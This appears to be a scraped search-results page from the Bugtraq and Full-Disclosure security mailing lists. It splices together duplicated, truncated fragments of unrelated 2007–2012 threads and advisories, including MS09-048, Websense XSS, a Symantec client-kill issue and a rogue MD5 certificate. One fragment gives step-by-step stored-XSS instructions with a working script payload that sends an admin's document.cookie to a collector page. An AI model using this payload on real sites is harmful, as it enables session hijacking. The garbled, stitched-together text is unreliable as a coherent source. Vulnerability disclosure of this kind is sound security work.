Next Page >>
subject
> -----Original Message-----
> From: Larry Seltzer [mailto:larry@larryseltzer.com]
> Sent: Wednesday, September 16, 2009 5:03 PM
> To: Susan Bradley; Thor (Hammer of God)
> Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
> Subject: RE: [Full-disclosure] 3rd party patch for XP for MS09-048?
>
> Yes, they used the bulletin to soft-pedal the description, but at the
> same time I think they send a message about XP users being on shaky
> ground. Just because they've got 4+ years of Extended Support Period
> left doesn't mean they're going to get first-class treatment.
-----Original Message-----
From: Larry Seltzer [mailto:larry@larryseltzer.com]
Sent: Wednesday, September 16, 2009 5:03 PM
To: Susan Bradley; Thor (Hammer of God)
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: RE: [Full-disclosure] 3rd party patch for XP for MS09-048?
Yes, they used the bulletin to soft-pedal the description, but at the
same time I think they send a message about XP users being on shaky
ground. Just because they've got 4+ years of Extended Support Period
left doesn't mean they're going to get first-class treatment.
> -----Original Message-----
> From: Larry Seltzer [mailto:larry@larryseltzer.com]
> Sent: Wednesday, September 16, 2009 5:03 PM
> To: Susan Bradley; Thor (Hammer of God)
> Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
> Subject: RE: [Full-disclosure] 3rd party patch for XP for MS09-048?
>
> Yes, they used the bulletin to soft-pedal the description, but at the
> same time I think they send a message about XP users being on shaky
> ground. Just because they've got 4+ years of Extended Support Period
> left doesn't mean they're going to get first-class treatment.
-----Original Message-----
From: full-disclosure-bounces@lists.grok.org.uk [mailto:full-disclosure-bounces@lists.grok.org.uk] On Behalf Of NSO Research
Sent: Tuesday, October 20, 2009 12:10 PM
To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: [Full-disclosure] NSOADV-2009-003: Websense Email Security Cross Site Scripting
_________________________________________
Security Advisory NSOADV-2009-003
_________________________________________
_________________________________________
>>> -----Original Message-----
>>> From: Larry Seltzer [mailto:larry@larryseltzer.com] Sent: Wednesday,
>>> September 16, 2009 5:03 PM
>>> To: Susan Bradley; Thor (Hammer of God)
>>> Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
>>> Subject: RE: [Full-disclosure] 3rd party patch for XP for MS09-048?
>>>
>>> Yes, they used the bulletin to soft-pedal the description, but at the
>>> same time I think they send a message about XP users being on shaky
>>> ground. Just because they've got 4+ years of Extended Support Period
>>> left doesn't mean they're going to get first-class treatment.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
fetchmail-SA-2009-01: Improper SSL certificate subject verification
Topics: Improper SSL certificate subject verification
Author: Matthias Andree
Version: 1.0
Announced: 2009-08-06
[mailto:full-disclosure-bounces@lists.grok.org.uk] On Behalf Of Susan
Bradley
Sent: Wednesday, September 16, 2009 2:26 PM
To: Thor (Hammer of God)
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: Re: [Full-disclosure] 3rd party patch for XP for MS09-048?
It's only "default" for people running XP standalone/consumer that are
not even in a home network settings.
That kinda slices and dices that default down to a VERY narrow sub sub
--------------------------------------------------
From: "Sandeep Cheema" <51l3n7@live.in>
Sent: Friday, February 20, 2009 11:01 AM
To: <bugtraq@securityfocus.com>
Subject: Re: SEPKILL /im SMC.EXE /f
> Privilege Escalation attack
>
> POC:
>
This can be exploited to execute arbitrary HTML and script code in a
user's browser session in context of the Web Administrator frontend.
2. XSS in webfrontend through a Mail Subject:
---------------------------------------------
The Subject of an email sent through the Websense Mail Security
server is not properly sanitized before shown in the Web Administrator
frontend.
> -----Original Message-----
> From: Jim Harrison [mailto:Jim@isatools.org]
> Sent: Sunday, July 20, 2008 4:33 PM
> To: 'me@abegetchell.com'; 'Thor (Hammer of God)'; 'Johan Beisser'
> Cc: bugtraq@securityfocus.com
> Subject: RE: Windows Vista Power Management & Local Security Policy
>
> It's about reality & priorities.
>
> What we're both saying is:
> 1. it's a bug and should be fixed in accordance with its impact on real
Thor (Hammer of God) wrote:
> Yeah, I know what it is and what it's for ;) That was just my subtle way of trying to make a point. To be more explicit:
>
> 1) If you are publishing a vulnerability for which there is no patch, and for which you have no intention of making a patch for, don't tell me it's mitigated by ancient, unusable default firewall settings, and don't withhold explicit details. Say "THERE WILL BE NO PATCH, EVER. HERE'S EVERYTHING WE KNOW SO YOU CAN DETERMINE YOUR OWN RISK." Also, don't say 'you can deploy firewall settings via group policy to mitigate exposure' when the firewall obviously must be accepting network connections to get the settings in the first place. If all it takes is any listening service, then you have issues. It's like telling me that "the solution is to take the letter 'f' out of the word "solution."
>
> 2) Think things through. If you are going to try to boot sales of Win7 to corporate customers by providing free XP VM technology and thus play up how important XP is and how many companies still depend upon it for business critical application compatibility, don't deploy that technology in an other-than-default configuration that is subject to a DoS exploit while downplaying the extent that the exploit may be leveraged by saying that a "typical" default configuration mitigates it while choosing not to ever patch it. Seems like simple logic points to me.
>
> t
>
>
>> -----Original Message-----
Yeah, I know what it is and what it's for ;) That was just my subtle way of trying to make a point. To be more explicit:
1) If you are publishing a vulnerability for which there is no patch, and for which you have no intention of making a patch for, don't tell me it's mitigated by ancient, unusable default firewall settings, and don't withhold explicit details. Say "THERE WILL BE NO PATCH, EVER. HERE'S EVERYTHING WE KNOW SO YOU CAN DETERMINE YOUR OWN RISK." Also, don't say 'you can deploy firewall settings via group policy to mitigate exposure' when the firewall obviously must be accepting network connections to get the settings in the first place. If all it takes is any listening service, then you have issues. It's like telling me that "the solution is to take the letter 'f' out of the word "solution."
2) Think things through. If you are going to try to boot sales of Win7 to corporate customers by providing free XP VM technology and thus play up how important XP is and how many companies still depend upon it for business critical application compatibility, don't deploy that technology in an other-than-default configuration that is subject to a DoS exploit while downplaying the extent that the exploit may be leveraged by saying that a "typical" default configuration mitigates it while choosing not to ever patch it. Seems like simple logic points to me.
t
> -----Original Message-----
> From: Susan Bradley [mailto:sbradcpa@pacbell.net]
--------------------------------------------------
From: "David Calabro" <dcalabro@transitionalwork.org>
Sent: Saturday, February 14, 2009 1:02 AM
To: "'Sandeep Cheema'" <51l3n7@live.in>; <bugtraq@securityfocus.com>
Subject: RE: SEPKILL /im SMC.EXE /f
> If the Symantec Management Client service was somehow changed from
> "smc.exe" to "smc.exe -P" it would effectively prevent the service from
> starting in the first place. Correct?
>
--------------------------------------------------
From: "Sandeep Cheema" <51l3n7@live.in>
Sent: Thursday, February 19, 2009 12:50 PM
To: <bugtraq@securityfocus.com>
Subject: Re: SEPKILL /im SMC.EXE /f
> Please note the following. I have reported this to Symantec at
> https://forums.symantec.com/syment/board/message?board.id=endpoint_protection11&thread.id=25786&view=by_date_ascending&page=2
>
>
-----Original Message-----
From: Abe Getchell [mailto:me@abegetchell.com]
Sent: Sunday, July 20, 2008 12:32 PM
To: 'Thor (Hammer of God)'; Jim Harrison; 'Johan Beisser'
Cc: bugtraq@securityfocus.com
Subject: RE: Windows Vista Power Management & Local Security Policy
So, you guys don't think it's an issue that power management in Vista
(apparently) has a pass to bypass local security policy?
--
Date: Tue, 10 Jan 2012 14:22:08 -0500
From: Hugo Fortier <hfortier@recon.cx>
User-Agent: Unknown
MIME-Version: 1.0
To: "info@recon.cx" <info@recon.cx>
Subject: Yo
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Who forgot to shut down the VAX VM?
-------
1) Register in The SIte
2) Go to send message http://path/?action=compose
3)We Put in
To:admin name
Subject: Some Subject
Message: <script>document.location ="http://localhost/[path]/cookie.php?cookie=" + document.cookie;</script>
The js code Worked When The admin Read The Message
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2) HTML Injection
+++++++++++++++++
-----Original Message-----
From: Sandeep Cheema [mailto:51l3n7@live.in]
Sent: Friday, February 13, 2009 12:25 PM
To: bugtraq@securityfocus.com
Subject: Re: SEPKILL /im SMC.EXE /f
Just as an update couldn't get any further other than t.he fact that
SMCGui.exe is getting killed as its running in the user account and SMC.exe
in the system account.
> -----Original Message-----
> From: Larry Seltzer [mailto:larry@larryseltzer.com]
> Sent: Wednesday, September 16, 2009 8:21 AM
> To: Thor (Hammer of God); Eric C. Lukens; bugtraq@securityfocus.com
> Cc: full-disclosure@lists.grok.org.uk
> Subject: RE: [Full-disclosure] 3rd party patch for XP for MS09-048?
>
> I agree that the FAQ explanation in the advisory is vague about what
> protection the firewall provides. One clue I would infer about it is
> that they rated this a "Low" threat. If it were vulnerable in the
> default configuration, with the firewall (or some other firewall) on,
--------------------------------------------------
From: "Sandeep Cheema" <51l3n7@live.in>
Sent: Wednesday, February 18, 2009 1:54 PM
To: "Sandeep Cheema" <51l3n7@live.in>; "Jon Kloske" <jon@uq.edu.au>
Cc: <bugtraq@securityfocus.com>
Subject: Re: SEPKILL /im SMC.EXE /f
> In fact looks like Symantec has inherited the bug from Sygate. The
> original one looks to be patched up though but on similar lines.
>
> http://seclists.org/bugtraq/2005/Dec/0249.html
> -----Original Message-----
> From: Thor (Hammer of God) [mailto:thor@hammerofgod.com]
> Sent: Saturday, July 19, 2008 6:20 PM
> To: me@abegetchell.com; Jim Harrison; bugtraq@securityfocus.com
> Subject: RE: Windows Vista Power Management & Local Security Policy
>
> If Jim is going to get Nancy to run a program, and that's "not all that
> hard," then why not just have that program do what you want in the
> first
> place rather than worrying about the power switch nonsense? This is
http://maildemo.smartertools.com/Login.aspx
Apparently this webmail is vulnerable to an attack xss very dangerous because it runs automatically when you open the inbox.
The vulnerability is to create a malformed mail, the procedure is to add a line of code on the subject and this causes the execution of xss in your inbox.
Simply add the following line of code in the subject of the mail to execute the subject:
The line of code is stored in the text file by precautions that just copy and paste it into the subject of the mail to test concept
Intro:
Word 2007 is the latest installment of Microsoft's word processing program
Bug:
Word 2007 with the "save as pdf" add-on is vulnerable to a path disclosure when using the feature's email as pdf option, accessible through the office button. This feature enables a user to email a word doc as a pdf without saving it as a pdf first. When doing so, the full path to the file is placed on the subject line of the email being drafted. When working with documents that are not resident on the user's drive or an accessible network share (such as an email attachment or web page) the path to the temporary file that is created is placed in the subject line. Like so:
From: Joey Jackrabbit
Sent: Friday, November 30, 2007 2:15 PM
To: Jacob Smith
Cc: John Smith
Issue First Created: 2007-11-08
Issue Last Modified: 2007-11-08
Issue Revision: 01
____________________________________________________________________________
Subject Name: perl
Subject Summary: Programming Language
Subject Home: http://www.perl.com/
Subject Versions: 5.* <= 5.8.8
Vulnerability Id: CVE-2007-5116
>> From: full-disclosure-bounces@lists.grok.org.uk [mailto:full-
>> disclosure-bounces@lists.grok.org.uk] On Behalf Of Thor (Hammer of God)
>> Sent: Wednesday, September 16, 2009 8:00 AM
>> To: Eric C. Lukens; bugtraq@securityfocus.com
>> Cc: full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] 3rd party patch for XP for MS09-048?
>>
>> Thanks for the link. The problem here is that not enough information
>> is given, and what IS given is obviously watered down to the point of
>> being ineffective.
>>
> From: full-disclosure-bounces@lists.grok.org.uk [mailto:full-
> disclosure-bounces@lists.grok.org.uk] On Behalf Of Thor (Hammer of God)
> Sent: Wednesday, September 16, 2009 8:00 AM
> To: Eric C. Lukens; bugtraq@securityfocus.com
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] 3rd party patch for XP for MS09-048?
>
> Thanks for the link. The problem here is that not enough information
> is given, and what IS given is obviously watered down to the point of
> being ineffective.
>
Jeroen
-----Original Message-----
From: Andrew Barkley <barkley@usa.net>
To: Jeroen <nowhereman@moenen.org>
Subject: Re: Circumventing Critical Security in Windows XP
Date: Sat, 20 Feb 2010 04:20:46 -0000
Hi,
-----Original Message-----
From: Thor (Hammer of God) [mailto:thor@hammerofgod.com]
Sent: Friday, January 15, 2010 10:05 AM
To: Gadi Evron
Cc: bugtraq@securityfocus.com
Subject: RE: All China, All The Time
Inline:
> Subject: Re: All China, All The Time
------------------------------------------------------------------------
<iq type="set">
<query xmlns="webmail:iq:auth">
<forgot>invalid@example.com</forgot>
<captcha uid="5861146275903694001237908440543">Z2JK 3WWY</captcha>
<subject>Your password for %EMAIL%</subject>
<message>
Dear %FULLNAME%,
your login data for webmail are following:
Username: %USERNAME%
Issuer: C=US, O=Equifax Secure Inc., CN=Equifax Secure Global
eBusiness CA-1
Validity
Not Before: Jul 31 00:00:01 2004 GMT
Not After : Sep 2 00:00:01 2004 GMT
Subject: CN=MD5 Collisions Inc. (http://www.phreedom.org/md5)
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:ba:a6:59:c9:2c:28:d6:2a:b0:f8:ed:9f:46:a4:
Next Page>>
|
